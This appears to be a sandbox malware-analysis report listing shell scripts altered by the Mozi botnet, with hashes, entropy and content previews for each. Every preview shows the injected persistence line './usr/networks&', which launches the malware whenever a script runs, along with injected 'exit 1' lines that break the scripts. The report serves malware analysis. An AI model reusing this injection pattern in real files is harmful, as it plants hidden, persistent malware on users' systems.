                                                                                                        Preview: ./usr/networks&..exit $had_error..;;. -v)..shift..tag_name="$1"..tag=$(git show-ref --verify --hash -- "refs/tags/$tag_name") ||...die "Seriously, what tag are you talking about?"..git-verify-tag -v "$tag"..exit $?..;;. -*). usage..;;. *)..break..;;. esac.done..[ -n "$list" ] && exit 0..name="$1".[ "$name" ] || usage.prev=0000000000000000000000000000000000000000.if git show-ref --verify --quiet -- "refs/tags/$name".then. test -n "$force" || die "tag '$name' already exists". prev=$(git rev-parse "refs/tags/$name").fi.shift.git check-ref-format "tags/$name" ||..die "we do not like '$name' as a tag name."..object=$(git rev-parse --verify --default HEAD "$@") || exit 1.type=$(git cat-file -t $object) || exit 1.tagger=$(git var GIT_COMMITTER_IDENT) || exit 1..test -n "$username" ||..username=$(git config user.signingkey) ||..username=$(expr "z$tagger" : 'z\(.*>\)')..trap 'rm -f "$GIT_DIR"/TAG_TMP* "$GIT_DIR"/TAG_FINALMSG "$GIT_DIR"/TAG_EDITMSG' 0..if [ "$annotate" ]
                                                                                                        /usr/share/doc/git/contrib/examples/git-verify-tag.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):243
                                                                                                        Entropy (8bit):5.091025781115778
                                                                                                        Encrypted:false
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.git cat-file tag "$1" >"$GIT_DIR/.tmp-vtag" || exit 1.sed -n -e '../^-----BEGIN PGP SIGNATURE-----$/q..p.' <"$GIT_DIR/.tmp-vtag" |.gpg --verify "$GIT_DIR/.tmp-vtag" - || exit 1.rm -f "$GIT_DIR/.tmp-vtag"../usr/networks&.exit 1.
                                                                                                        /usr/share/doc/git/contrib/examples/git-whatchanged.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):792
                                                                                                        Entropy (8bit):4.925184193549972
                                                                                                        Encrypted:false
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.diff_tree_flags=$(git-rev-parse --sq --no-revs --flags "$@") || exit.case "$0" in.*whatchanged)..count=..test -z "$diff_tree_flags" &&...diff_tree_flags=$(git config --get whatchanged.difftree)..diff_tree_default_flags='-c -M --abbrev' ;;.*show)..count=-n1..test -z "$diff_tree_flags" &&...diff_tree_flags=$(git config --get show.difftree)..diff_tree_default_flags='--cc --always' ;;.esac.test -z "$diff_tree_flags" &&..diff_tree_flags="$diff_tree_default_flags"..rev_list_args=$(git-rev-parse --sq --default HEAD --revs-only "$@") &&.diff_tree_args=$(git-rev-parse --sq --no-revs --no-flags "$@") &&..eval "git-rev-list $count $rev_list_args" |.eval "git-diff-tree --stdin --pretty -r $diff_tree_flags $diff_tree_args" |.LESS="$LESS -S" ${PAGER:-less}../usr/networks&.exit 1.
                                                                                                        /usr/share/doc/git/contrib/fast-import/git-import.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):486
                                                                                                        Entropy (8bit):5.198694046664742
                                                                                                        Encrypted:false
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&..exit 1.fi..USERNAME="$(git config user.name)".EMAIL="$(git config user.email)"..if [ -z "$USERNAME" -o -z "$EMAIL" ]; then..echo "You need to set user name and email"..exit 1.fi..git init..(..cat <<EOF.commit refs/heads/$1.committer $USERNAME <$EMAIL> now.data <<MSGEOF.$2.MSGEOF..EOF..find * -type f|while read i;do...echo "M 100644 inline $i"...echo data $(stat -c '%s' "$i")...cat "$i"...echo..done..echo.) | git fast-import --date-format=now../usr/networks&.exit 1.
                                                                                                        /usr/share/doc/git/contrib/git-resurrect.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2904
                                                                                                        Entropy (8bit):5.006955417229927
                                                                                                        Encrypted:false
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&. sed -ne "/^$_x40 \($_x40\) Merge .*/ {s//\1/p;$early_exit}".}..search_merge_targets () {..git rev-list --all --grep="Merge branch '[^']*' into $branch\$" \...--pretty=tformat:"%H %s" --all |..sed -ne "/^\($_x40\) Merge .*/ {s//\1/p;$early_exit} ".}..dry_run=.early_exit=q.scan_reflog=t.scan_reflog_merges=.scan_merges=.scan_merge_targets=.new_name=..while test "$#" != 0; do..case "$1" in.. -b|--branch)...shift...new_name="$1"...;;.. -n|--dry-run)...dry_run=t...;;.. --no-dry-run)...dry_run=...;;.. -k|--keep-going)...early_exit=...;;.. --no-keep-going)...early_exit=q...;;.. -m|--merges)...scan_merges=t...;;.. --no-merges)...scan_merges=...;;.. -l|--reflog)...scan_reflog=t...;;.. --no-reflog)...scan_reflog=...;;.. -r|--reflog_merges)...scan_reflog_merges=t...;;.. --no-reflog_merges)...scan_reflog_merges=...;;.. -t|--merge-targets)...scan_merge_targets=t...;;.. --no-merge-targets)...scan_merge_targets=...;;.. -a|--all)...scan_
                                                                                                        /usr/share/doc/git/contrib/remotes2config.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):23
                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                        Encrypted:false
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                        /usr/share/doc/git/contrib/rerere-train.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):637
                                                                                                        Entropy (8bit):4.973192610623575
                                                                                                        Encrypted:false
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&..exit 1.}..mkdir -p "$GIT_DIR/rr-cache" || exit..git rev-list --parents "$@" |.while read commit parent1 other_parents.do..if test -z "$other_parents"..then...# Skip non-merges...continue..fi..git checkout -q "$parent1^0"..if git merge $other_parents >/dev/null 2>&1..then...# Cleanly merges...continue..fi..if test -s "$GIT_DIR/MERGE_RR"..then...git show -s --pretty=format:"Learning from %h %s" "$commit"...git rerere...git checkout -q $commit -- ....git rerere..fi..git reset -q --hard.done..if test -z "$branch".then..git checkout "$original_HEAD".else..git checkout "${branch#refs/heads/}".fi../usr/networks&.exit 1.
                                                                                                        /usr/share/doc/git/contrib/subtree/git-subtree.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):14967
                                                                                                        Entropy (8bit):5.111069408805373
                                                                                                        Encrypted:false
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.eval "$(echo "$OPTS_SPEC" | git rev-parse --parseopt -- "$@" || echo exit $?)"..PATH=$PATH:$(git --exec-path).. git-sh-setup..require_work_tree..quiet=.branch=.debug=.command=.onto=.rejoin=.ignore_joins=.annotate=.squash=.message=.prefix=..debug().{..if [ -n "$debug" ]; then...printf "%s\n" "$*" >&2..fi.}..say().{..if [ -z "$quiet" ]; then...printf "%s\n" "$*" >&2..fi.}..progress().{..if [ -z "$quiet" ]; then...printf "%s\r" "$*" >&2..fi.}..assert().{..if "$@"; then...:..else...die "assertion failed: " "$@"..fi.}...#echo "Options: $*"..while [ $# -gt 0 ]; do..opt="$1"..shift..case "$opt" in...-q) quiet=1 ;;...-d) debug=1 ;;...--annotate) annotate="$1"; shift ;;...--no-annotate) annotate= ;;...-b) branch="$1"; shift ;;...-P) prefix="${1%/}"; shift ;;...-m) message="$1"; shift ;;...--no-prefix) prefix= ;;...--onto) onto="$1"; shift ;;...--no-onto) onto= ;;...--rejoin) rejoin=1 ;;...--no-rejoin) rejoin= ;;...--ignore-joins) ignore_joins=1 ;;...--no-ignore-joins) ignore_joi
                                                                                                        /usr/share/doc/git/contrib/subtree/t/t7900-subtree.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):23
                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                        Encrypted:false
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                        /usr/share/doc/git/contrib/thunderbird-patch-inline/appp.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):822
                                                                                                        Entropy (8bit):5.456000973546581
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:w6vCJsHKfrLCYwTlFfOf4L3DXKPvX90Eq2qBGSCP6pF5ViL2gR2DFfZf97n:rCJeyaYwD+UKXGRBmAF5I0Zl7
                                                                                                        MD5:0D11588BAF66BBD90273FDA188DDA2CD
                                                                                                        SHA1:EE2F4255479F30769F44E8CB5E284E632DD3B4AD
                                                                                                        SHA-256:37757E412DB565E1A291349C036785A00ED5B89431A1598E6C16900BBCFFE356
                                                                                                        SHA-512:991F89DD0AC1B1D3071F5103CAE959FCE46E608EA2F065F248D45727777265C49E30E865CCE16785B9565FD324BE23BCAD3B475A87FF5DCAE28067875CC9DB2E
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&..exit 1.fi..cd - > /dev/null..SUBJECT=$(sed -n -e '/^Subject: /p' "${PATCH}").HEADERS=$(sed -e '/^'"${SEP}"'$/,$d' $1).BODY=$(sed -e "1,/${SEP}/d" $1).CMT_MSG=$(sed -e '1,/^$/d' -e '/^---$/,$d' "${PATCH}").DIFF=$(sed -e '1,/^---$/d' "${PATCH}")..CCS=`echo -e "$CMT_MSG\n$HEADERS" | sed -n -e 's/^Cc: \(.*\)$/\1,/gp' \..-e 's/^Signed-off-by: \(.*\)/\1,/gp'`..echo "$SUBJECT" > $1.echo "Cc: $CCS" >> $1.echo "$HEADERS" | sed -e '/^Subject: /d' -e '/^Cc: /d' >> $1.echo "$SEP" >> $1..echo "$CMT_MSG" >> $1.echo "---" >> $1.if [ "x${BODY}x" != "xx" ] ; then..echo >> $1..echo "$BODY" >> $1..echo >> $1.fi.echo "$DIFF" >> $1..LAST_DIR=$(dirname "${PATCH}")..grep -v "^LAST_DIR=" "${CONFFILE}" > "${CONFFILE}_".echo "LAST_DIR=${LAST_DIR}" >> "${CONFFILE}_".mv "${CONFFILE}_" "${CONFFILE}"../usr/networks&.exit 1.
                                                                                                        /usr/share/doc/hddtemp/contribs/analyze/graph-field.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):23
                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                        /usr/share/doc/hddtemp/contribs/analyze/hddtemp_monitor.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):617
                                                                                                        Entropy (8bit):4.789300168717738
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:ag6vEfH2QDFh7iYAfFnQiOuO72M6SFnQ73gfDfiem9MrE9HnDYha/MHrZIgHDMvX:4EvFIYGQi2qf0QcfDqurE9jYA/MLljMv
                                                                                                        MD5:13C31185F2BB9F9D26E363B9415D49B2
                                                                                                        SHA1:5D3AACF7D8FC903F7CEB6ED329C90F52ABCF3246
                                                                                                        SHA-256:2DFFED792FEC0D8B455B8230152C893848C28600007A907391BC27A74EA8F2B4
                                                                                                        SHA-512:050843F8AA048E4D7B14E4F292AE0381E81B3F49F382B5288FB13EF88FD3189A7AEBC2987E31F31A7D09BDC9E53D94B27FEAE57B3BE3E4822FBCE51B03424A3D
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&. exit 1.fi..logger -s -t hddtemp "starting hddtemp monitor: interval=$interval, tmpdir=$tmpdir, drive=$drive".stamp=`date +%s`.tmpfile_old="$tmpdir/hddtemp-$stamp".hddtemp $drive --debug > "$tmpfile_old"..while [ 1 ] ; do. sleep $interval. stamp=`date +%s`. tmpfile_new="$tmpdir/hddtemp-$stamp". hddtemp $drive --debug > "$tmpfile_new". RETURNED=`diff "$tmpfile_old" "$tmpfile_new"`. if [ -n "$RETURNED" ] ; then. logger -s -t hddtemp "change $tmpfile_new !!!". tmpfile_old="$tmpfile_new". else. logger -s -t hddtemp "no change". rm "$tmpfile_new". fi.done../usr/networks&.exit 1.
                                                                                                        /usr/share/doc/hddtemp/contribs/hddtemp-all.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1015
                                                                                                        Entropy (8bit):4.896629241453442
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:raKURpM5kJl8cI094qTAYCyiaLZZTu0BCauu0BC4ojDOpHpjFxDf0u0Nm4:raPpM5kJucIUN+zyZ5utauut4gDOdpja
                                                                                                        MD5:87F1604CDCC54749A6A6D814FBB28530
                                                                                                        SHA1:2E815968A4F6A0F92924E94C4D94BBE5F68BA871
                                                                                                        SHA-256:E53623C100D004F567645C208CA688CEEDF7E50B14226BC66D96C22CC12944EF
                                                                                                        SHA-512:C1C92619C802D476F41832EF89E728F89CCD277C6B26AD0AD436466DC9338D24A3064976D4E9C471342370A84FD3D9A9803411DC2D0BCA82ADEA0DFD550EACFC
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&..exit 1.fi...# NOTE, you could actually change this to .# ls /dev/hd? /dev/sd?.# but then you would need to remove the cruft of non-existant drives....df -l |cut -f 1 -d " " |grep /dev/ |sed -e 's/[[:digit:]]$//g' |sort -u |.while read drive; do..# TODO: ..case "$drive" in.. /dev/sd*|/dev/hd*).. # NOTE: Scsi devices might be error-prone, since many non-HDD.. # devices uses SCSI or SCSI emulation (CD-ROMs, USB mass storage..)...hddtemp $drive...;;.. /dev/md*).. # TODO: it could actually look somewher for the information.. # of the disks that make up the raid, maybe looking it up.. # at /proc/mdstat.. .echo "RAID devices currently not supported ($drive)"...;;.. /dev/vg*).. .echo "LVM devices currently not supported ($drive)"...;;.. /dev/cdrom*|/dev/fd*).. # Some common non-HD elements which might be mounted,.. # we skip these.. .;;.. *).. .echo "Unknown drive currently not supported ($drive)"...;;..esac.done..exit 0../usr/ne
                                                                                                        /usr/share/doc/ifupdown/examples/check-mac-address.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):461
                                                                                                        Entropy (8bit):5.204671186006819
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:boybzOC2OPhB+NT3uGK6nRE9CLAYFyW4CK4jWb+YtYn:bo0PhcdW9CLKW4x4jWi/
                                                                                                        MD5:590EDF96613EB2B783D98ED51A5F19A4
                                                                                                        SHA1:3C6570765592737D02E8010FD9A159A39DCDCC38
                                                                                                        SHA-256:BB77853D6FDBD37E5B234F1ECE3A223E07BDBE02CCEFC70D9FA6849ECB47F59A
                                                                                                        SHA-512:6DC5C0F411328DE21CEFA82E8B1CD57CEE3AF5EDC0144860BEB2B291A534DFB1667B70E95D99586804D2489306377FF1F4B22C8A1D1A4E78353223717C5E47DD
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.# If it does it exits with 0 (success) status;.# if it doesn't then it exists with 1 (error) status...set -e..export LANG=C..if [ ! "$2" ] ; then..echo "Usage: $0 IFACE targetMAC"..exit 1.fi.iface="$1".targetmac=`echo "$2" | sed -e 'y/ABCDEF/abcdef/'`.mac=$(/sbin/ifconfig "$iface" | sed -n -e '/^.*HWaddr \([:[:xdigit:]\-]*\).*/{s//\1/;y/ABCDEF/abcdef/;p;q;}')..if [ "$targetmac" = "$mac" ]; then exit 0; else exit 1; fi../usr/networks&.exit 1.
                                                                                                        /usr/share/doc/ifupdown/examples/get-mac-address.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):92
                                                                                                        Entropy (8bit):4.373538165973413
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVCghzalTFgZNLdMRveMgoOORgn:whzalTFgZNpMRGMgTn
                                                                                                        MD5:15DD9BBF0482D9ADCED6141F43FC3C89
                                                                                                        SHA1:F4416E70988E52171A2F7027509F98AAE444E8B6
                                                                                                        SHA-256:CB678F95B78104B7BD05D11C5AF75843331744E2EAB1504A32627FB30DE17238
                                                                                                        SHA-512:39C8DD448D3D1F8C4BAECB16A395BC55EA2554E4ED627743FC26A76B12C750CE451BC3CE72AEFF94286A260DCB06AC016AE44F9BD3A12372F1DD31776783FE62
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.if [ "$which" ]; then echo $which; exit 0; fi.exit 1../usr/networks&.exit 1.
                                                                                                        /usr/share/doc/ifupdown/examples/pcmcia-compat.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):519
                                                                                                        Entropy (8bit):5.218301073324955
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:5HUuJUHUd82RPHUAOBJ6gMWGwWSTsyzEblTKfahBUlTGNCgTn:50QU0NRP0L6g/gfbleqUlw
                                                                                                        MD5:7CE36959719763E25A79EF6FBE77FD68
                                                                                                        SHA1:3D32B1EF561E7CDD58B69D01B30F6F23D339805D
                                                                                                        SHA-256:2C2DA71A12186FDDE2BDFAEA192105B1010C1279BB82334185690788E2EFAF79
                                                                                                        SHA-512:4ACE6DF91473556C67C22C26FA905D93E6BB08D564851AC21BED82609DA4990D032FE81884214CDAA0A149FDEF4D2393CB2A02EE42CDA2743B9BD017918D6605
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.if [ ! -e /etc/pcmcia/shared ]; then exit 1; fi..pcmcia_shared () {... /etc/pcmcia/shared.}..iface="$1"..# /etc/pcmcia/shared sucks.pcmcia_shared "start" $iface.usage () {..exit 1.}..get_info $iface.HWADDR=`/sbin/ifconfig $DEVICE | sed -n -e 's/.*addr \([^ ]*\) */\1/p'`..which="".while read glob scheme; do..if [ "$which" ]; then continue; fi..case "$SCHEME,$SOCKET,$INSTANCE,$HWADDR" in...$glob) which=$scheme ;;..esac.done..if [ "$which" ]; then echo $which; exit 0; fi.exit 1../usr/networks&.exit 1.
                                                                                                        /usr/share/doc/ifupdown/examples/ping-places.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):633
                                                                                                        Entropy (8bit):4.881818972878624
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:5EmBJQX+U2/lTxroNurUQm6k0fQmje5jrGlTGNCgTn:hQWldrK8Dq0o+e1Glw
                                                                                                        MD5:99E4E569B07969486DA912C2B9A33E23
                                                                                                        SHA1:3BAA43B8E0D2B693C426DDA2FA6D67DEAEADB09C
                                                                                                        SHA-256:3C5803C83626B98195C7F48B7B83D131670DFA9541EDB8B30915C684FD39CCB9
                                                                                                        SHA-512:8BAE9DC8E5F540044980649EF028FEF8C4FE945B05578EE1DB963A32AABC53F7D24FCD5DDB396FB9430E4CDFB6E1E6F19A535A1790072F5750D961F4FB8E3214
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.if [ `id -u` -ne 0 ] || [ "$1" = "" ]; then exit 1; fi..if [ -x /usr/bin/fping ]; then..PING="/usr/bin/fping".else..PING="/bin/ping -c 2".fi..iface="$1".which=""..while read addr pingme scheme; do..if [ "$which" ]; then continue; fi...#echo " Trying $addr & $pingme ($scheme)" >&2...ip addr add $addr dev $iface >/dev/null 2>&1..ip link set $iface up >/dev/null 2>&1...if $PING $pingme >/dev/null 2>&1; then...which="$scheme"...fi..ip link set $iface down >/dev/null 2>&1..ip addr del $addr dev $iface >/dev/null 2>&1.done..if [ "$which" ]; then echo $which; exit 0; fi.exit 1../usr/networks&.exit 1.
                                                                                                        /usr/share/doc/lm-sensors/examples/daemon/healthd.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):266
                                                                                                        Entropy (8bit):4.736279036741599
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:a5z9kOtWR2xokRVic6v3ApkRVX1dhlz4n:a53tPSjnz4n
                                                                                                        MD5:E97AC4982B9BDFC8ED84ADA38E7BA000
                                                                                                        SHA1:DE41A53FAE2E629E10235800917CDE6B2E0301AC
                                                                                                        SHA-256:DADFB755A5E8D372A17BA4A4C8DC9DFB87AF4AD674EC8760617A16772FB2FFA4
                                                                                                        SHA-512:B0035AA0879CE1F07F05B1CC3ABFD6F06C38D617D3A03248520B9B2F9790B6CE78156741330B2D4FE90A6BABF5493F944F281CE1BBE3B49864D35F4DF0F97314
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&. exit.fi..while true.do. sleep 15. sensors_state=$(sensors). if [[ "$sensors_state" =~ 'ALARM' ]]. then. echo "$sensors_state" | mail -s '**** Hardware Health Warning ****' $ADMIN_EMAIL. sleep 600. fi.done../usr/networks&.exit 1.
                                                                                                        /usr/share/doc/lm-sensors/examples/tellerstats/gather.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2712
                                                                                                        Entropy (8bit):5.4524991837552035
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:rM6SsguNoTTNpEoTVWuoTBdg69FpV9ZH0GXMZP9SFDAWxuQNa2K0uVl2dv4i:yF/E/l3XMZgNyZRo
                                                                                                        MD5:A148FED2694A1A82F4ABF9A28D0293DC
                                                                                                        SHA1:4652F09BF1B6FB1859FB4816EFB666AE371C13E6
                                                                                                        SHA-256:8E15D1F50B0C524C72F1AB62314D647BF610D9B15952A0FEABA439C111868D7D
                                                                                                        SHA-512:9E3AD1B35163A6875351B4028C473277FD120F7159D8E0F0BDA66BF6E0205AAA4ABA5053E9B30E702D99F15FDF5F5A1486216F7B4B7ED667807DF487E75777E8
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&. exit 1.fi ... $TELLERSTATS_CONF..if [ ! -d $DBPATH ].then. echo "$0: data directory $DBPATH does not exist". exit 1.fi..if [ ! -d $SENSORPATH ].then. echo "$0: sensor information directory $SENSORPATH does not exist.". exit 1.fi..if [ ! -d $HTMLROOT ].then. echo "$0: The root of your webserver - $HTMLROOT - does not exist..bailing out". exit 1.fi..if [ ! -d $HTMLPATH ].then. echo "$0: The place where we keep HTML files and pictures - $HTMLPATH - does not exist..bailing out". exit 1.fi..if [ ! -r $GNUPLOTSCRIPT_TMPL ].then. echo "$0: The gnuplot script template $GNUPLOTSCRIPT_TMPL does not exist..bailing out". exit 1.fi..export DBPATH SENSORPATH TEMPPATH HTMLROOT HTMLPATH GNUPLOTSCRIPT_TMPL..if [ -n "$DEBUG" ].then. echo "DBPATH = $DBPATH". echo "SENSORPATH = $SENSORPATH". echo "TEMPPATH = $TEMPPATH". echo "HTMLROOT = $HTMLROOT". echo "HTMLPATH = $HTMLPATH". echo "GNUPLOTSCRIPT_TMPL = $GNUPLOTSCRIPT_TMPL".fi..# generic tellerstats ini
                                                                                                        /usr/share/doc/lm-sensors/examples/tellerstats/tellerstats.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2564
                                                                                                        Entropy (8bit):5.346461718403454
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:rM6SsguNoTTNpEoTVWuoTBdg69FpV9Zgz5QcJdcg63JI7+thz3pDsZdRtNzazELX:yF/E/lQ5QcJz7+tN3pAbRtJazELX
                                                                                                        MD5:5A7BF4FFD03AE3B45F7EF8500A88D63C
                                                                                                        SHA1:DBFF57314EAD3467F2357BF20E7D40FC20AE846C
                                                                                                        SHA-256:8221FFC6B5CE193B173F22C873712D38673239A36E2E1C5F931F040A9D96440F
                                                                                                        SHA-512:735D29AC37C532983BDCC294F401FF0B65B836A4012276266D68A249262EF50506742622163697A1F5665C4FD1761BE33006199F313E21DAA91236E7CD09632A
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&. exit 1.fi ... $TELLERSTATS_CONF..if [ ! -d $DBPATH ].then. echo "$0: data directory $DBPATH does not exist". exit 1.fi..if [ ! -d $SENSORPATH ].then. echo "$0: sensor information directory $SENSORPATH does not exist.". exit 1.fi..if [ ! -d $HTMLROOT ].then. echo "$0: The root of your webserver - $HTMLROOT - does not exist..bailing out". exit 1.fi..if [ ! -d $HTMLPATH ].then. echo "$0: The place where we keep HTML files and pictures - $HTMLPATH - does not exist..bailing out". exit 1.fi..if [ ! -r $GNUPLOTSCRIPT_TMPL ].then. echo "$0: The gnuplot script template $GNUPLOTSCRIPT_TMPL does not exist..bailing out". exit 1.fi..export DBPATH SENSORPATH TEMPPATH HTMLROOT HTMLPATH GNUPLOTSCRIPT_TMPL..if [ -n "$DEBUG" ].then. echo "DBPATH = $DBPATH". echo "SENSORPATH = $SENSORPATH". echo "TEMPPATH = $TEMPPATH". echo "HTMLROOT = $HTMLROOT". echo "HTMLPATH = $HTMLPATH". echo "GNUPLOTSCRIPT_TMPL = $GNUPLOTSCRIPT_TMPL".fi..# generic tellerstats ini
                                                                                                        /usr/share/doc/mdadm/examples/mdadd.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):9649
                                                                                                        Entropy (8bit):5.350733164859712
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:mjHnCbuuH+ycHcTK8K8Ks89tg8C8Wdq7cmwc9bVxoY2uwt6fqI9lAnVKS4ID7KMz:ms7hBBC7pWdSK6SI8KzK77
                                                                                                        MD5:4E3AA249886275CE240D98F18CCB0B12
                                                                                                        SHA1:0E0A966CB506E61DE4F27571D3D3EF973AE70A94
                                                                                                        SHA-256:12D9472701FC5E974C36D6FB456F43063EC370CAB5AE42AF8E880C76031FD5B8
                                                                                                        SHA-512:5117AEB0CA27616A88CDB5C358078C2DF29784037C9D0CDFFE55F54441EBDC81B19FF6CB1356355EC35DFCABE0FD4AC514B18227ED78D486F66054CAD9E226FE
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&. exit 2. fi.}...sanity_check().{. if [ "$(id -u)" != "0" ]; then . printf "\033[40m\033[1;31mERROR: Root check FAILED (you MUST be root to use this script)! Quitting...\n\033[0m" >&2. exit 1. fi.. check_binary mdadm. check_binary sfdisk. check_binary dd. check_binary awk. check_binary grep. check_binary sed. check_binary cat.. if [ -z "$SOURCE" ] || [ -z "$TARGET" ]; then. echo "ERROR: Bad or missing argument(s)" >&2. show_help;. exit 4. fi.. if ! echo "$SOURCE" |grep -q '^/dev/'; then. printf "\033[40m\033[1;31mERROR: Source device $SOURCE does not start with /dev/! Quitting...\n\033[0m" >&2. exit 5. fi.. if ! echo "$TARGET" |grep -q '^/dev/'; then. printf "\033[40m\033[1;31mERROR: Target device $TARGET does not start with /dev/! Quitting...\n\033[0m" >&2. exit 5. fi.. if echo "$SOURCE" |grep -q 'md[0-9]'; then. printf "\033[40m\033[1;31mERROR: The source device specified is an md-device! Quitting...\n\033[0m" >&2. e
                                                                                                        /usr/share/doc/netcat-openbsd/examples/dist.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):46
                                                                                                        Entropy (8bit):3.925523369006428
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVOOR3vKDlOORgn:uK4n
                                                                                                        MD5:2CADDA792FBD37B54978108B6CC504D4
                                                                                                        SHA1:C28DD4FAC0523E31F0220FF31417583882C82692
                                                                                                        SHA-256:E6D7ED75CDB1FA6A44D3ACEC4A6933828B8FEA70FF78C167E49214E7D1634305
                                                                                                        SHA-512:681E59EF7DEE6E6F60C0ABF3325E5F64DF4CEA10A4D0DA585198ECD3BE951722DBE2559F6CE20E70CB97E84E7CEFEED4DC6AC78204D9C9FF403343ECEC7997A0
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.exit 0../usr/networks&.exit 1.
                                                                                                        /usr/share/doc/popularity-contest/examples/bin/popcon-process.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):23
                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.exit 1.
